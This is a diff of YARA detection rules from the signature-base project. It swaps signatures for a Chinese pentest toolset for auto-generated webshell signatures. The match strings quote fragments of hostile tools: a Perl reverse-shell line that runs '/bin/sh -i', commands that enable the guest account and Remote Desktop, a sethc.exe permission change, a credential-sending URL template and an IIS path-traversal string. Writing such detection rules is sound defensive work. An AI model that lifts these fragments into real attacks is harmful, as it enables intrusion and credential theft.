+		logic_hash = "b9dc66e249c0577839cc3748f129c343d2ccb7327b92a2a67e4467782d10a25e"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "www.InsidePro.com" fullword wide
-		$s1 = "SAMInside.exe" fullword wide
+		$s4 = "Copyright 2000 by Foundstone, Inc."
+		$s5 = "You must have administrator privileges to run fport - exiting..."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 650KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webscan_Wwwscan : FILE
+rule SIGNATURE_BASE_Backdoor__Fr_
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
+		description = "Webshells Auto-generated - file BackDooR (fr).php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "defe0024-f94a-560a-a9f6-b3849b41f9bb"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1965-L1981"
+		id = "fd0c77e8-18b7-5eb4-8ed4-87ee4c864683"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8029-L8040"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
-		logic_hash = "9d2eee1c1783a08a2eae86d4ea77bdb67db8cf0055a24d88ea09411e63018e8c"
-		score = 70
+		hash = "a79cac2cf86e073a832aaf29a664f4be"
+		logic_hash = "6c16c200712015eed71aeb119e46bad5f93445a8f719d98ef31f9012cb3551ae"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
-		$s2 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
-		$s3 = "<Usage>:  %s <HostName|Ip> [Options]" fullword ascii
+		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_2_3389 : FILE
+rule SIGNATURE_BASE_FSO_S_Ntdaddy
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file 3389.exe"
+		description = "Webshells Auto-generated - file ntdaddy.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b2f5f6d-4d7b-561c-bd77-2de351e5aca8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L1983-L1999"
+		id = "b6b655b8-7bce-5fa5-97b7-a020a7e53f4f"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8041-L8052"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "48d1974215e5cb07d1faa57e37afa91482b5a376"
-		logic_hash = "97e2a08dd391de44fc01c44ca6463aa009e93ad199a330eb99aaa809f14f2ef0"
-		score = 70
+		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
+		logic_hash = "4df6f53ee9bfc0214e69dd858878026e962b90573ed48a5ffdd5523538e8f3bf"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\Documents and Settings\\Administrator\\" ascii
-		$s2 = "net user guest /active:yes" fullword ascii
-		$s3 = "\\Microsoft Word.exe" ascii
+		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_PHP_Php11 : FILE
+rule SIGNATURE_BASE_Nstview_Nstview
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file php11.txt"
+		description = "Webshells Auto-generated - file nstview.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e20eaab1-9799-5e61-9a25-3ac0dcce5f7f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2001-L2017"
+		id = "00df601c-bddb-5da8-bef4-d2122419b5d0"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8053-L8064"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "dcc8226e7eb20e4d4bef9e263c14460a7ee5e030"
-		logic_hash = "d32b0540521a6b1d65c224bdee463813d72846c26f27326a092bdf3b90c3ae7c"
-		score = 70
+		hash = "3871888a0c1ac4270104918231029a56"
+		logic_hash = "2b25e22d86a672af0b8957f1b0336ed80e09f3389f5045c230af2372db0e3415"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii
-		$s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii
-		$s3 = "echo '[cPanel Found] '.$login.':'.$pass.\"  Success\\n\";" fullword ascii
+		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
 
 	condition:
-		filesize < 800KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webcruiserwvs : FILE
+rule SIGNATURE_BASE_Hytop_Devpack_Upload
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file WebCruiserWVS.exe"
+		description = "Webshells Auto-generated - file upload.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "16bed1e8-a1f0-5fcf-9c03-83625a388547"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2019-L2034"
+		id = "43054993-b0dd-5d2e-9890-db1f47759be5"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8065-L8076"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6c90a9ed4c8a141a343dab1b115cc840a7190304"
-		logic_hash = "dd37765488f07299048e9b8fc552120e76d628e0adcaf474fce9bfe60774a0c8"
-		score = 70
+		hash = "b09852bda534627949f0259828c967de"
+		logic_hash = "312020a72a37adb0111ac6d61810c8e476be39dc6456e80e83cd6a680e8ea051"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "id:uid:user:username:password:access:account:accounts:admin_id:admin_name:admin_" ascii
-		$s1 = "Created By WebCruiser - Web Vulnerability Scanner http://sec4app.com" fullword wide
+		$s0 = "<!-- PageUpload Below -->"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Hookmsgina : FILE
+rule SIGNATURE_BASE_Passwordreminder
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
+		description = "Webshells Auto-generated - file PasswordReminder.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2036-L2053"
+		id = "642033ee-4454-5913-8348-4d1579fc0bd8"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8077-L8088"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
-		logic_hash = "1e268624a5f8df200ef1a03ce167f38feda59836a864e17297473ba223c5895a"
-		score = 70
+		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
+		logic_hash = "f3da5381f5e352c541654d2af918ca8cea8049d137078670dd0538a4d13f676e"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii
-		$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii
-		$s3 = "Global\\WinlogonHack_Load%u" fullword ascii
-		$s4 = "Hookmsgina.dll" fullword ascii
+		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Sig_3389_Xp3389 : FILE
+rule SIGNATURE_BASE_Pack_Injectt
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file xp3389.exe"
+		description = "Webshells Auto-generated - file InjectT.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "75d23c63-ba9e-55fd-90fe-5e054d28a777"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2055-L2071"
+		id = "3a640c22-0cd4-5ab1-9216-c68625d7d505"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8089-L8104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d776eb7596803b5b94098334657667d34b60d880"
-		logic_hash = "7fd7947a802a65dfd63ece3fc6eaf2da8207e99276a9f6b1ff2c937cf4327945"
-		score = 70
+		hash = "983b74ccd57f6195a0584cdfb27d55e8"
+		logic_hash = "9f66b7b429ed585888c0fb4943bb12262247b3af8d85bc67309b27752171e66a"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"fdenytsconnections\"=dword:00000000 >> c:\\reg.reg" fullword ascii
-		$s2 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >" ascii
-		$s3 = "echo \"Tsenabled\"=dword:00000001 >> c:\\reg.reg" fullword ascii
+		$s3 = "ail To Open Registry"
+		$s4 = "32fDssignim"
+		$s5 = "vide Internet S"
+		$s6 = "d]Software\\M"
+		$s7 = "TInject.Dll"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Cookiesview : FILE
+rule SIGNATURE_BASE_FSO_S_Remexp_2
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
+		description = "Webshells Auto-generated - file RemExp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "71a43797-4b5b-5f87-a70e-ebabc00d9319"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2073-L2089"
+		id = "501544d5-fe52-5933-8782-516ffe18f3ff"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8105-L8117"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c54e1f16d79066edfa0f84e920ed1f4873958755"
-		logic_hash = "9711bb15f08c18ba068325d1cca0ded8e252ded4ceddfb134d1317ad8a19fbe8"
-		score = 70
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+		logic_hash = "e31e25a7c2b2e970a379a61d2dac335bd37cac48328eee9f3966ff5c77ef6f18"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "V1.0  Http://www.darkst.com Code:New4" fullword ascii
-		$s1 = "maotpo@126.com" fullword ascii
-		$s2 = "www.baidu.com" fullword ascii
+		$s2 = " Then Response.Write \""
+		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 640KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V4_LPK : FILE
+rule SIGNATURE_BASE_FSO_S_C99
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
+		description = "Webshells Auto-generated - file c99.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "808f5de2-1360-521e-8939-b759e361507c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2091-L2108"
+		id = "0b176370-a5ab-587a-b0e9-ef4fe5c604bd"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8118-L8129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2b2ab50753006f62965bba83460e3960ca7e1926"
-		logic_hash = "a7382d61b53706ad51b36bc686a1c3f0018ee111bdc8ae9b05af144230dfbba3"
-		score = 70
+		hash = "5f9ba02eb081bba2b2434c603af454d0"
+		logic_hash = "de769299bbd8b895b84db757fcc037b807f7caaa624c06e9d330934a968b2381"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "http://127.0.0.1/1.exe" fullword wide
-		$s2 = "FreeHostKillexe.exe" fullword ascii
-		$s3 = "\\sethc.exe /G everyone:F" ascii
-		$s4 = "c:\\1.exe" fullword ascii
+		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Scanhistory : FILE
-{
-	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ScanHistory.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "85585cd2-c5ed-5465-bcac-b61211570055"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2110-L2126"
+rule SIGNATURE_BASE_Rknt_Zip_Folder_Rknt
+{
+	meta:
+		description = "Webshells Auto-generated - file RkNT.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a58a3b33-8096-535a-b930-2eb71347edb8"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8130-L8147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "14c31e238924ba3abc007dc5a3168b64d7b7de8d"
-		logic_hash = "657a25b5103799446fa88abda39d36a05e080c18d41e9dd98199b506f2bfc419"
-		score = 70
+		hash = "5f97386dfde148942b7584aeb6512b85"
+		logic_hash = "59de8a40a7081ee5fbea9f413590237c1da9985f2352b32571529baf38c93ddb"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ScanHistory.exe" fullword wide
-		$s2 = ".\\Report.dat" fullword wide
-		$s3 = "select  * from  Results order by scandate desc" fullword wide
+		$s0 = "PathStripPathA"
+		$s1 = "`cLGet!Addr%"
+		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s3 = "oQToOemBuff* <="
+		$s4 = "ionCdunAsw[Us'"
+		$s6 = "CreateProcessW: %S"
+		$s7 = "ImageDirectoryEntryToData"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Invasionerasor : FILE
+rule SIGNATURE_BASE_Dbgntboot
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
+		description = "Webshells Auto-generated - file dbgntboot.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03ccb643-9f92-5278-a358-65f56cf19ccc"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2128-L2146"
+		id = "6b9381e6-597d-5e74-a318-9931d20a9d08"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8148-L8160"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b37ecd9ee6b137a29c9b9d2801473a521b168794"
-		logic_hash = "d2f742693682e9409284706a3eb63536a576cb162629bf76bfabf2e0210984a3"
-		score = 70
+		hash = "4d87543d4d7f73c1529c9f8066b475ab"
+		logic_hash = "10f86f18aff4995928efb3c8000eca166fe37e6006de7938139cad718ff7653f"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "c:\\windows\\system32\\config\\*.*" fullword wide
-		$s2 = "c:\\winnt\\*.txt" fullword wide
-		$s3 = "Command1" fullword ascii
-		$s4 = "Win2003" fullword ascii
-		$s5 = "Win 2000" fullword ascii
+		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
+		$s3 = "sth junk the M$ Wind0wZ retur"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Super_Injection1 : FILE
+rule SIGNATURE_BASE_PHP_Shell
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file super Injection1.exe"
+		description = "Webshells Auto-generated - file shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ad84c5a0-4f03-5040-bdf7-819b40a08ad2"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2148-L2164"
+		id = "08dff4db-3b1c-5702-a8c9-efaedf83c4ff"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8161-L8173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8ff2df40c461f6c42b92b86095296187f2b59b14"
-		logic_hash = "11a3628b7c34a34dc37604430195e24063d3f0dd0889d6d782ce0ee42cafbb02"
-		score = 70
+		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
+		logic_hash = "a62061b2fa851f5798158198e26f188408f3f37dca69a85ca155777c0b8407ee"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide
-		$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s4 = "ScanInject.log" fullword ascii
+		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
+		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Pk_Pker : FILE
+rule SIGNATURE_BASE_Hxdef100
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Pker.exe"
+		description = "Webshells Auto-generated - file hxdef100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dff0e4fb-6b2e-5fa8-910d-63a9e5030b95"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2166-L2186"
+		id = "fb376c18-02d2-5866-a0e2-ccb5262091dd"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8174-L8187"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "631787f27f27c46f79e58e1accfcc9ecfb4d3a2f"
-		logic_hash = "ea29bc82131751f0aaa4f10cc7576a27d243fb7dade03db7ae3dcb029b306505"
-		score = 70
+		hash = "55cc1769cef44910bd91b7b73dee1f6c"
+		logic_hash = "a2002dcddad7ffdbe9614723163016f9357347bb704640d3933ce4513c37d474"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe" fullword wide
-		$s2 = "msadc/..\\..\\..\\..\\winnt/system32/cmd.exe" fullword wide
-		$s3 = "--Made by VerKey&Only_Guest&Bincker" fullword wide
-		$s4 = ";APPLET;EMBED;FRAMESET;HEAD;NOFRAMES;NOSCRIPT;OBJECT;SCRIPT;STYLE;" fullword wide
-		$s5 = " --Welcome to Www.Pker.In Made by V.K" fullword wide
-		$s6 = "Report.dat" fullword wide
-		$s7 = ".\\Report.dat" fullword wide
+		$s0 = "RtlAnsiStringToUnicodeString"
+		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 5 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Getpass_Getpass : FILE
+rule SIGNATURE_BASE_Rdrbs100
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
+		description = "Webshells Auto-generated - file rdrbs100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2188-L2204"
+		id = "369e5ce0-984c-54eb-96d4-fbfb4f932ba6"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8188-L8200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
-		logic_hash = "90d802da512f5d460eda6d644660711601d361e2402522d085d3225931a3fca3"
-		score = 70
+		hash = "7c752bcd6da796d80a6830c61a632bff"
+		logic_hash = "8a427ef9e0ecd0c810913203aaef43647964f33658dfdca8195fce6f0545f8f4"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\only\\Desktop\\" ascii
-		$s2 = "To Run As Administuor" ascii
-		$s3 = "Key to EXIT ... & pause > nul" fullword ascii
+		$s3 = "Server address must be IP in A.B.C.D format."
+		$s4 = " mapped ports in the list. Currently "
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_F4Ck_Team_Blackmoon_Jun15 : FILE
+rule SIGNATURE_BASE_Mithril_Mithril
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
+		description = "Webshells Auto-generated - file Mithril.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "df12daca-8e03-5382-b71d-96a747d3a043"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_tools.yar#L2206-L2227"
+		id = "81645f57-7d7e-5b4d-b323-744f2cde4916"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L8201-L8219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
-		logic_hash = "85db31c6bca6e5ddd45168a3adbc382d5a9e8128e0b2a6ed5efe1a2fcd42ff3d"
-		score = 70
+		hash = "017191562d72ab0ca551eb89256650bd"
+		logic_hash = "5d19eb4132a0401d226c9cffc927b2838e9c69428746296b55a488d097759587"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "File UserName PassWord [comment] /add" fullword ascii
-		$s2 = "No Net.exe Add User" fullword ascii
-		$s3 = "BlackMoon RunTime Error:" fullword ascii
-		$s4 = "Team.F4ck.Net" fullword wide
-		$s5 = "admin 123456789" fullword ascii
-		$s6 = "blackmoon" fullword ascii
-		$s7 = "f4ck Team" fullword wide
+		$s0 = "OpenProcess error!"
+		$s1 = "WriteProcessMemory error!"
+		$s4 = "GetProcAddress error!"
+		$s5 = "HHt`HHt\\"
+		$s6 = "Cmaudi0"
